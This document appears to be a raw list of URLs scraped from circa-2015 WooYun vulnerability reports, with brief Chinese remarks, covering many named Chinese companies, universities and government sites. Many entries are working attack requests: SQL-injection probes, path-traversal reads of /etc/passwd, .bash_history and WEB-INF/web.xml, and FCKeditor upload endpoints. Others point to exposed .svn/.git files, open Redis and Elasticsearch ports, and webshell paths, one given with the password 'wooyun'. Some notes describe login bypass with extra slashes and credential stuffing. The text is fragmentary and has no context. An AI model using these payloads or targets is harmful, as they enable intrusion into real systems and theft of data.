http://**.**.**.**:8090/vj/admin/Practice/AddHortationPunish.aspx http://**.**.**.**:8090/vj/admin/Practice/AddPatrol.aspx http://**.**.**.**:8090/vj/admin/ReportCard/Add.aspx http://**.**.**.**:8090/vj/admin/ReportCard/AddReport.aspx http://**.**.**.**:8090/vj/admin/ShortMessage/Iframe_TelSend.aspx http://**.**.**.**:8090/vj/Graduate/classGroup/addBook.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/AdminMsg.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/Iframe_Admin.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/Iframe_Emp.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/Iframe_StuSend.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/StudentMsg.aspx http://**.**.**.**:8090/vj/Website/certificate.aspx http://**.**.**.**:8090/vj/Website/stu.aspx http://**.**.**.**:8090/vj/admin/classGroup/addressBook.aspx http://**.**.**.**:8090/vj/admin/classGroup/notedAlumnus.aspx http://**.**.**.**:8090/vj/admin/classGroup/xyDonateMoneyManage.aspx http://**.**.**.**:8090/vj/admin/classGroup/xyDonateMoneyManageEdit.aspx http://**.**.**.**:8090/vj/admin/WebsiteManage/VideoMag.aspx http://eduadmin.openonline.com.cn/BasicSystem/Teaching/Tplan_Material_DetailNew.aspx?MaterialOwnerShipID=4&RecruitBatchID=4701&LevelID=0&SpecialityID=0&universitycode=10006&UniversityName= http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/admin http://**.**.**.**:81/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**:8080/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**:82/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**:81//GetPasswdCfm.asp?USERACCOUNTID=1 http://wap.8684.cn http://203.130.41.108/ http://**.**.**.**:801/t.aspx?i=20140910170019-881396-00-000 http://**.**.**.**:8088/t.aspx?i=20150617100937-919003-00-000 http://**.**.**.**/zfxxgk/t.aspx?i=20151014111008-156445-00-000 http://**.**.**.**:888/t.aspx?i=20150914172216-299655-00-000 http://**.**.**.**:8080/t.aspx?i=20150707120539-594438-00-000 http://**.**.**.**/t.aspx?i=20080620113741-751258-00-000 http://**.**.**.**/t.aspx?i=20131207234443-184446-00-000 http://**.**.**.**/t.aspx?i=20150807093523-405968-00-000 http://**.**.**.**/website/t.aspx?i=20150928161618-368289-00-000 http://**.**.**.**/bugs/wooyun-2015-0148559 http://**.**.**.**/system/Default.aspx,输入万能密码 http://**.**.**.**/website/sublist/newssublist.aspx?mkid=62 http://mail.jlbank.com.cn/ http://**.**.**.**:8001/lianlife/logon/main.jsp http://**.**.**.**:8001/lianlife/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://219.232.237.70:8082/ http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://192.168.1.14/login.jsp http://yun.admin5.com www.acunetix-referrer.com http://www.health.taikang.com/sbt/indexlis.jsp www.health.taikang.com/sbt/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://x.1mxian.com/bonus/id/40030097 http://x.1mxian.com/bonus/id/40030096 http://x.1mxian.com/bonus/id/40030095 http://x.1mxian.com/bonus/id/40030094 http://hq.fruitday.com:88/messager/users.data http://hq.fruitday.com:89/login.do http://hq.fruitday.com:88/login/Login.jsp?logintype=1 http://oa.52mf.cn/messager/users.data http://oa.52mf.cn:89/login.do http://oa.52mf.cn/login/Login.jsp?logintype=1 http://eip.crcchem.com/messager/users.data http://eip.crcchem.com/login/Login.jsp?logintype=1 http://eip.crcchem.com:89/login.do http://beijing.daojia.com.cn/index.html http://**.**.**.**/bugs/wooyun-2010-0116977 http://**.**.**.**/kfweb/hot.aspx?mid1=0005&mid2=0002&webid=2 http://**.**.**.**/querynetweb/hot.aspx?mid1=0005&mid2=0002&webid=2 http://**.**.**.**/kefa/hot.aspx?mid1=0001&mid2=0005&webid=2 http://**.**.**.**:8080/KfWeb/hot.aspx?mid1=0001&mid2=0005&webid=2 http://**.**.**.**/bugs/wooyun-2010-0120901 http://**.**.**.**/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**:8080/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**:8080/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 com:6379 com:6379 http://cn.hx.travelsky.com:80/hxuo/index.jsp http://*/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://**.**.**.**/ http://**.**.**.**/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://**.**.**.**/easyscan/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://oa.tianya.cn/wui/theme/ecology7/page/login.jsp?templateId=6&logintype=1&gopage=&message=17 http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001 http://oa.airchinapm.com:2001/yyoa/index.jsp http://oa.tianya.cn/messager/users.data http://oa.tianya.cn/wui/theme/ecology7/page/login.jsp http://beijing.daojia.com.cn/?city=1 http://wx.mojichina.com/.svn/entries http://vpn.mojichina.com/.svn/entries http://admin.1jiajie.com/v2/index.php?action=login http://login.meitu.com/这个好像就是主站的登录位置哦,发现没有登录限制,然后抓包用户名和密码都是明文传输的 http://e.o2obest.cn/api/comment/commentapplist http://**.**.**.**/default.asp http://**.**.**.**/admin/login.asp http://m.rrs.com/snaplb/FAQ/listByNum.ajax http://my.iciba.com/此处接口无验证码无登录限制的,用户名密码均明文传输的可撞库网站用户 http://c.open.163.com/.git/config http://www.lvmama.com/zt/promo/zhaomu/ http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://**.**.**.**/sysTemplateWeb/Answerlist.aspx?XXDM=440203000008&CatalogId=110101 http://mail.91160.com/ http://store.rrs.com/nearStore/ajaxJsp/experience_store.jsp?area_id=1&postType=getStorePage&pageNo=0 http://store.rrs.com/nearStore/ajaxJsp/experience_store.jsp?pid=1&postType=getRegion http://fws.rrs.com/ http://fws.rrs.com/login_reset http://beijing.daojia.com.cn/appraisedaojia.php http://www.union-ins.cn/regist http://www.union-ins.cn/getBackPassword http://**.**.**.**/about/index.asp?id=1 http://**.**.**.**/pages/GCS/news_main.aspx?ID=273&tv=001 http://**.**.**.**:8086/gdlisweb/MagazineCantoRequest.aspx http://**.**.**.**:82/netweb/MagazineCantoRequest.aspx http://**.**.**.**/MagazineCantoRequest.aspx http://new.sqgf.com/auth/signin.jsp http://**.**.**.**/bugs/wooyun-2010-0137042 http://**.**.**.**:9085//document/imp/filebrowser.jsp?dir=D:\\ http://www.**.**.**.**/bugs/wooyun-2015-0124027 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://**.**.**.**/IneduPortal/Components/Student/ShowStudent.aspx?id=1 http://www.health.taikang.com/sbt/indexlis.jsp http://www.health.taikang.com/sbt/common/cvar/CExec.jsp http://202.115.194.51/Admin/Default.aspx https://**.**.**.**/node/stock-market/plaza/sell?user_id=115153 http://pols.ecnu.edu.cn http://pols.ecnu.edu.cn/admin/admin.php http://118.26.192.92 server:3TOM2***********x http://**.**.**.**/archives/detail_userlist.php?jb=1&urlcode=%E6%88%90%E9%83%BD%E5%8F%A4%E5%BE%81%E6%88%BF%E5%9C%B0%E4%BA%A7%E7%BB%8F%E7%BA%AA%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://**.**.**.**/archives/detail_userlist.php?jb=1&urlcode=%E6%88%90%E9%83%BD%E5%8F%A4%E5%BE%81%E6%88%BF%E5%9C%B0%E4%BA%A7%E7%BB%8F%E7%BA%AA%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 https://github.com/fbwfbi/Some_work_scripts/blob/13493395bd8c6ed5dba079bd6ec9dc2151afab26/mailsend.sh www1.daojia.com.cn http://idm2.tcl.com/WebConsole/login/login.jsp http://idm2.tcl.com:8088/manager/html http://idm2.tcl.com:8088/anjiePrjbak/ http://idm2.tcl.com:8088/webdaxp/ http://idm2.tcl.com:8088/webdoc/ http://www.lagou.com/gongsi/j92011.html http://myou.erp.shopware.cn http://m.xin.com/ http://**.**.**.**/Default.aspx http://**.**.**.**/Default.aspx http://**.**.**.**/phpmyadmin/ http://jikao17.open.com.cn/matriculationonline/login.asp http://jikao17.open.com.cn/matriculationonline/ http://******.xinnet.com/account/login http://www.sinnet.com.cn/UserFiles/ http://**.**.**.**/index.asp http://**.**.**.**/lecture.asp http://**.**.**.**/gzyq/admin/Details_Data.asp?id=46501 http://**.**.**.**:88/PreciousE/admin/Details_Data.asp?id=46501 http://**.**.**.**/pe/admin/Details_Data.asp?id=46501 http://**.**.**.**/gzyq/admin/Booking_State.asp?id=46501 http://**.**.**.**:88/PreciousE/admin/Booking_State.asp?id=46501 http://**.**.**.**/pe/admin/Booking_State.asp?id=46501 http://**.**.**.**/gzyq/admin/EnterUI.asp?id=206 http://**.**.**.**:88/PreciousE/admin/EnterUI.asp?id=206 http://**.**.**.**/pe/admin/EnterUI.asp?id=206 http://**.**.**.**/gzyq/admin/EnterUI_Syjl.asp?id=169724 http://**.**.**.**:88/PreciousE/admin/EnterUI_Syjl.asp?id=169724 http://**.**.**.**/pe/admin/EnterUI_Syjl.asp?id=169724 http://**.**.**.**/gzyq/admin/EnterUI_del.asp?ID=12&file=Used_Auditing.asp http://**.**.**.**:88/PreciousE/admin/EnterUI_del.asp?ID=12&file=Used_Auditing.asp http://**.**.**.**/pe/admin/EnterUI_del.asp?ID=12&file=Used_Auditing.asp http://**.**.**.**/gzyq/admin/EnterUI_XG.asp?id=206 http://**.**.**.**:88/PreciousE/admin/EnterUI_XG.asp?id=206 http://**.**.**.**/pe/admin/EnterUI_XG.asp?id=206 http://**.**.**.**/gzyq/common/sort.asp?condition=+where+%B4%FA%C2%EB%C3%FB%B3%C6+like++%27%251%25%27&str=&columns1=%B4%FA%C2%EB%C3%FB%B3%C6&connect=like&columns1_value=1&numrecord=25 http://**.**.**.**:88/PreciousE/common/sort.asp?condition=+where+%B4%FA%C2%EB%C3%FB%B3%C6+like++%27%251%25%27&str=&columns1=%B4%FA%C2%EB%C3%FB%B3%C6&connect=like&columns1_value=1&numrecord=25 http://**.**.**.**/pe/common/sort.asp?condition=+where+%B4%FA%C2%EB%C3%FB%B3%C6+like++%27%251%25%27&str=&columns1=%B4%FA%C2%EB%C3%FB%B3%C6&connect=like&columns1_value=1&numrecord=25 http://**.**.**.**/onews.asp?id=23 https://i.wkzq.com.cn/ https://i.wkzq.com.cn/page/common/download/down.down?f=../WEB-INF/web.xml http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11 http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11 http://**.**.**.**/company_detail.php?id=1 http://**.**.**.**/company_detail.php?id=1 http://**.**.**.**/admin/_login.php http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=6&pid=ScGsc-App-2008-140&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/projectInfo?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=6&pid=ScGsc-App-2008-140&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/cailiao?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=6&pid=ScGsc-App-2008-140&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/tiaojian?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/tiaojian?st=6&pid=ScGsc-App-2008-153&appid=sichuan-ScGsc-Org-2008-16 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-84&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 http://**.**.**.**:8080/egh/servlet/tiaojian?st=3&pid=ScGsc-App-2008-128&appid=sichuan-ScGsc-Org-2008-5 https://211.144.131.98:9043/ibm/console/ http://211.144.131.98:9080/safe_test/index.jsp http://dealer.xin.com/apply_dealer/get_city_all/ http://webchat.cpic.com.cn:9090 http://webchat.cpic.com.cn:9090/webcall_chat/leaveMessage.jsp http://mobile.taikang.com/tkmobile/service/ServiceInfoServlet?function_code=querymfinsurewn&mfinsure=M&sign=undefined http://**.**.**.**/nos/speedtest/saveuserinfo.jsp?account= http://hyzc.91huayi.com/secure/login.aspx http://www.xin.com/app/ https://github.com/songxin1990/logsys/blob/master/src/main/resources/log4j.properties http://113.108.48.22:7890/oa http://oa.hrsec.com.cn/messager/users.data http://post.8684.cn http://member.ly.com/Member/MemberInfomation.aspx jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.**/Index.action cn:6379 http://www.zyql.cn/ www.zyql.cn com:6379 http://webchat.cpic.com.cn:9090 http://webchat.cpic.com.cn:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ com:6379 jdbc:oracle:thin:@**.**.**.**:1521:orcl http://mail.minanins.com:9001/console/login/LoginForm.jsp http://**.**.**.**/ encap:Ethernet B1:1C:35:71:ED fe35:71ed/64 Scope:Link MTU:1500 packets:9085358280 packets:6694570843 txqueuelen:1000 http://58.213.14.165:89存在SQL注入 http://**.**.**.**/message/detail.asp?msgID=284 http://**.**.**.**/news/index.php?mode=data&id=15434 http://**.**.**.**/news/index.php?mode=data&id=15434 http://b.daojia.com.cn/ http://**.**.**.**/,注册一个测试账号~ http://**.**.**.**/ http://**.**.**.**:80/PassAccount/GetUserPass?email=31610165**@**.**.**.**&id=88975&phone=&code=SJgz http://**.**.**.**:7000/inform/frontsub/infoInput_specialOpen.action?type=2存在命令执行漏洞 http://www.snowbeerah.com/ http://www.snowbeerah.com/uploadfiles/2015/10/20151024101605165.aspx密码wooyun http://mp.youku.com/user/userinfo http://mp.youku.com/passport/index?domain=youku https://oa.xin.com/weaver/weaver.email.FileDownloadLo http://103.47.87.72:7001/otcwms http://103.47.87.72:7001/console/login/LoginForm.jsp http://103.47.87.72:7001/ma/ma1.jsp http://buzz.hiiir.com:80/ http://cme.91huayi.com/secure/login.aspx http://cme.91huayi.com/secure/login.aspx http://**.**.**.**//jxpj/xbcx_Login.asp http://**.**.**.**/jxpj/xbcx_Login.asp http://**.**.**.**/jxpj/xbcx_Login.asp http://**.**.**.**:86/jxpj/xbcx_Login.asp http://**.**.**.**/jxpj/xbcx_Login.asp http://**.**.**.**:86/jxpj/xbcx_Login.asp http://buzz.hiiir.com:80/ http://**.**.**.**:888/yyoa/ http://**.**.**.**:888/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://**.**.**.**:888/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20load_file http://**.**.**.**/fcc/activityDetail.do?eventid=168 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:86/ http://**.**.**.**/ http://**.**.**.**:86/ http://**.**.**.**//cjsr/gx_cjsr_login.asp http://**.**.**.**/cjsr/cjsr_login.asp http://**.**.**.**/jsxgmm.asp http://**.**.**.**/jxpj/pj_xscpqk.asp http://**.**.**.**:8085/servlet/vodsys.nameCheck http://daren.sc.weibo.com/h5/front/search http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=1%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522 http://daren.sc.weibo.com/aj/h5/front/search?type=p&val=1%%27%20AND%201=2%20AND%20%27%%27=%27&page=1&_t=0&__rnd=1445667398522 https://**.**.**.**/yanhom1314/chengdusifaju http://**.**.**.** http://cconline.southernfund.com:9898/ http://cconline.southernfund.com:9898/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File com:9898 http://cconline.southernfund.com:9898 www2.daojia.com.cn www2.daojia.com.cn http://ifs.swufe.edu.cn/ http://ifs.swufe.edu.cn/index.php?go=admin https://**.**.**.**/niujie123/myself/blob/3a705e4c7f706a7bcc3f4668bf391582136cba89/include/config/main.php http://**.**.**.** http://**.**.**.**:8080/boms3/aicf/loginForm.action http://spin.neusoft.com/xoops/ https://portal.neusoft.com/dana-na/auth/url_default/welcome.cgi http://**.**.**.**:8081 http://121.34.249.232:8080/ http://z.dangdang.com/project/add http://bbs.ihoms.com http://webcall.airchina.com.cn:9090/webstat/ucstarclient_webcall/client/ucallclient_1.jsp http://webcall.airchina.com.cn:9090/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File cn:9090 http://webcall.airchina.com.cn:9090 http://111.13.46.70:8020/index.php/Index/Basic/contacts.html http://www.wkzq.com.cn/wkzq/web/index.aspx https://i.wkzq.com.cn/down.down?f=20150922044304523.exe https://i.wkzq.com.cn/down.down?f=../WEB-INF/web.xml http://tm.ename.net/tm/download?AId=1 http://tm.ename.net/tm/download?AId=2 http://tm.ename.net/tm/download?AId=3 http://tm.ename.net/tm/download?AId=4 http://down.mobilesoftstore.com:8080/soft/1/chaojizhongduanzhuanyeban_7942_20121001.apk","date":"2015-10-08 http://www.gzxijiu.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.gzxijiu.cn:8080/yyoa/checkWaitdo.jsp?userID=1 http://www.gzxijiu.cn:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://www.gzxijiu.cn:8080/yyoa/assess/js/initDataAssess.jsp http://www.gzxijiu.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.gzxijiu.cn:8080/yyoa/common/SelectPerson/reloadData.jsp http://www.gzxijiu.cn:8080/yyoa/ext/https/getSessionList.jsp?cmd=getAll http://www.gzsz.com.cn:888/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://116.58.222.75/index.jsp http://ota.shendu.com/api.php?mod[]=111 http://**.**.**.**/UploadFile/Index/ shell:http://**.**.**.**/updown\1510\24200659.cer http://**.**.**.**/updown/1510/24201717.cer http://**.**.**.**//upload/doc/201510/24204744.cer http://**.**.**.**//upload/doc/201510/24204744.cer filetype:xls http://**.**.**.**/shgb_bm/ http://tee.sports.sohu.com http://www.yasabake.com旁站存在注射 http://**.**.**.**/search.aspx?q= http://**.**.**.**/sipicabgov/web/CheckBooking/AddBookingStep1.aspx http://**.**.**.**/english/index.php?content=teacher_person&id=13 http://**.**.**.**/english/index.php?content=teacher_person&id=13 http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96 http://**.**.**.**/index.php?option=com_content&view=article&id=16&Itemid=96 http://admin-safeurl.maxthon.cn/admin.php?c=index&a=run http://**.**.**.**/cn/newsshow.php?id=7 http://**.**.**.**/guest/index.action http://**.**.**.**/ http://**.**.**.**/html/p/p_13/p_13.html inurl:cms/leadermail http://**.**.**.**/fsmcms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/ucms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/pharm/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/fsmcms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/fsmcms/cms/leadermail/p_lettersearch.jsp http://**.**.**.**/bugs/wooyun-2010-099627 http://moa.glsc.com.cn:8001/homepage.action http://portal.sicnu.edu.cn:82/cas/login?service=http://portal.sicnu.edu.cn/cas.jsp http://**.**.**.**/bugs/wooyun-2015-0122763 http://**.**.**.**/doc/data/document.mdb http://0.plu.cn:9200/_river/_search http://01mistery.plu.cn:9200/_river/_search http://00o00.plu.cn:9200/_river/_search http://01.plu.cn:9200/_river/_search http://0755-oopp.plu.cn:9200/_river/_search http://007.plu.cn:9200/_river/_search www.mbaobao.com-sg=GHACAHAKFAAA http://ess.cninsure.net/product/logon/Login.jsp http://ess.cninsure.net/product/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://ssci.whut.edu.cn http://www.chake.net/Login.aspx http://math.whut.edu.cn/math_web/partII.asp?big_part=-1 http://im.dhzq.com.cn:9090/ http://im.dhzq.com.cn:9090/FCKeditor/editor/filemanager/upload/simpleuploader?Type=File http://im.dhzq.com.cn:9090 http://shippingtool.ebay.com.hk/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4 http://shippingtool.ebay.cn/Help/HelpDetail.html?typeid=e6d68975d8&type1id=0b9533376c&id=28b1eefbf4 commentdoc.php/1*/100/1/2/0 http://b.daojia.com.cn/service.php?action=2147483649&uid=1445698756644&user=e http://**.**.**.**/product/more.asp?bigclassid=27 http://**.**.**.**/culture/index.asp?id=5 http://**.**.**.**/ http://oa.glsc.com.cn:10040/wps/portal/ http://oa.glsc.com.cn:10040/glzqehr/personBase.do?method=Df_openLicense&licenseName=D:\\archivefile\\zhaopian\202.jpg http://oa.glsc.com.cn:10040/glzqehr/personBase.do?method=Df_openLicense&licenseName=D:\\archivefile\\zhaopian\202.jpg http://oa.glsc.com.cn:10040/glzqehr/main.do http://**.**.**.**/ksjs/ksjs-detel.asp?leibieid2=0&leibieid=3*&id=101 http://**.**.**.**/1999/xhtml http://demo.oa8000.com/htoa/temp/2.jsp会跳转到登录界面,虽然不清楚做了什么设置,但是多加几个斜杠轻松就绕过了http://demo.oa8000.com////htoa///temp////2.jsp http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/show.php?id=20140320142027660 http://**.**.**.**/ETD-search-c/view_etd?URN=etd-0723108-213849 http://**.**.**.**/ETD-search-c/view_etd?URN=etd-0723108-213849 http://**.**.**.**/volunteers/show_vhuodong.aspx?Vid=18803 http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109 http://**.**.**.**/ETD-db/ETD-search-c/view_etd?URN=etd-0626106-123109 http://**.**.**.**/ http://glsc.cobo.cn/portal/org/FindPassword/BO.cobo http://glsc.cobo.cn/portal/org/SelfRegister.cobo http://data.5i5j.com/sitemetrics.zip http://data.5i5j.com/sitemetrics/.svn/entries http://**.**.**.**/bugs/wooyun-2015-0132763 http://**.**.**.**/info_recordview.aspx?bbid=3 http://**.**.**.**/gdweb/info_recordview.aspx?bbid=3 http://**.**.**.**:8001/info_recordview.aspx?bbid=3 https://**.**.**.**/cway/DataCenter/blob/785a35862cc96e46cfc996a90440d61e197cc246/conf/application.ini http://**.**.**.**/BrandAdmin/login http://**.**.**.**/api/third_party_api/wifi_key/get https://github.com/oconnorendure/dwcenter/blob/e4b79a7f31ddea1fc20cfb078f22a7f663227357/src/main/conf/prd/systemConfig.properties http://i0.ule.com http://112.74.65.190:9001/ELearning/Login.do http://112.74.65.190:9001/console shell:http://112.74.65.190:9001/ca/ma3.jsp www.yangtianclub.com http://www.yangtianclub.com/ http://b.daojia.com.cn/ http://b.daojia.com.cn/index.php?action=2147483650 http://**.**.**.**/bugs/wooyun-2010-073346这个,对此系统再次进行检测,发现还有一处漏洞!!! http://**.**.**.**/admin/update.do?content=1125574332093&updateType=xwxxStore http://**.**.**.**/update.do?content=1125574332093&updateType=xwxxStore http://**.**.**.**/update.do?content=1125574332093&updateType=xwxxStore http://www.dkf88.com/ http://**.**.**.**/dan_title.php?type=10 http://www.zs6y.com:80/ www.zs6y.com http://**.**.**.**/noi2013.sql https://**.**.**.**/fishcy521/tdd_test/blob/cb00ec08f2137c9c27ca9da30c3a3631e8e360f5/tdd-rms/src/main/java/com/rms/commons/dbcp/EmailFactory.java http://**.**.**.**/whir_system/ http://**.**.**.**/uploadfiles/2015/10/201510251539563956.aspx http://**.**.**.**/news_content.asp?ID=12网址如上。 http://www.weimeng.net/ https://github.com/Nifury/Derivative/blob/7858a8e3b0366eeeff7e5417af9657ba26d1ca45/src/main/java/bl/ServiceImpl.java http://**.**.**.**/external4GMS/detailZC?flotNo=ZCBX2015090100000000312235700176 http://**.**.**.**/Html/Default.html http://**.**.**.**/SheYingPhotoContent.aspx?photoid=2012013016324000001 http://**.**.**.**/Ashx/Base/GetCompany.ashx?city= http://**.**.**.**/customer/hite_20110815/energy_details.asp?id=2011090517235600003 http://**.**.**.**/customer/rockwell/com-detail.asp?id=2936 http://**.**.**.**/customer/photo/zpzs_hy_list.Asp?industryid=2012071311541500002 http://**.**.**.**/customer/photo/hjzp_user_detail.asp?Id=10926 http://api.ycapp.yiche.com/Car/GetCarStylePropertys http://**.**.**.**/wsbs/wsbs.do?method=SdeptServ&coumnId=4028808b41484a02014148879d620007&flag=1 http://**.**.**.**/szfgsweb/wsbs/wsbs.do?method=SdeptServ&coumnId=402880023d5d08bd013d5d2feba50001&flag=1 http://**.**.**.**/lbweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414550400141455caa8c0000&flag=1 http://**.**.**.**/wsbs/wsbs.do?method=SdeptServ&coumnId=4028808b41484a02014148879d620007&flag=1 http://**.**.**.**/qinanweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40289e053de84f17013de88182370004&flag=1 http://**.**.**.**/wsbs/wsbs.do?method=SdeptServ&coumnId=402880023d5d08bd013d5d2feba50001&flag=1 http://**.**.**.**/kqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/weichengweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/qsqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 http://**.**.**.**/tyqweb/wsbs/wsbs.do?method=SdeptServ&coumnId=40288000414366160141436c20a70002&flag=1 